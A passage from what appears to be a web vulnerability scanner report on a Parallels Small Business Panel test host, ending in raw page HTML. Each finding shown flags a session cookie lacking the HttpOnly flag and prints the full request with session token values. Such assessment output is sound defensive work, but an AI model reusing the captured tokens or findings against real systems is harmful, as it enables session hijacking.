<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_Script');
               makeDraggable(module, 'Script');

               $('doubleClick_module_Script').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script><span style="vertical-align:middle;" class="TreeNodeIcon" title="Site Map" id="doubleClick_module_SiteMap"><table border="0">
<tr align="center"><td><div id="module_SiteMap"><img border="0" width="32px" height="32px" src="/modules/SiteMap/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>Site Map</span></td></tr>
</table></span><table border="0">
<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_SiteMap');
               makeDraggable(module, 'SiteMap');

               $('doubleClick_module_SiteMap').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script><span style="vertical-align:middle;" class="TreeNodeIcon" title="Voting" id="doubleClick_module_Voting"><table border="0">
<tr align="center"><td><div id="module_Voting"><img border="0" width="32px" height="32px" src="/modules/Voting/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>Voting</span></td></tr>
</table></span><table border="0">
<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_Voting');
               makeDraggable(module, 'Voting');

               $('doubleClick_module_Voting').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script>
</div></td></tr>
</table></td></tr></table>
<script>initModulePanel();</script>
</div></td>
</tr></table>
<input type="hidden" id="RightPanelDiv_hidden" value="false">
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Html');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table></form>
</body>
</html>

3.10. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/Image

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/Image HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:16 GMT
Connection: close


3.11. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:34 GMT
Connection: close


3.12. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:29 GMT
Connection: close


3.13. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Category/Add

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Add HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');
           
               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');
           
               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');
           
               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');
           
               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-NAME', 'Please provide a value for Name.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"><table class="sb-modalbox-help" style="padding-top: 5px; padding-bottom: 5px; width: 100%; padding-left: 10px;"><tr>
<td valign="top" style="padding-right: 10px;"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td width="100%" onclick="sb_status.showDetails();" id="StatusBar"><div id="StatusMessage">The page no longer exists.</div></td>
</tr></table></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Modules/ImageGallery?tab=categories');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Modules/ImageGallery/Category/Insert">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="modalFormBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="modalForm" style="width: 650px; height: 420px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="modalFormHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="modalFormTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Add New Category</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"><table class="sb-modalbox-help" style="padding-top: 5px; padding-bottom: 5px; width: 100%; padding-left: 10px;"><tr>
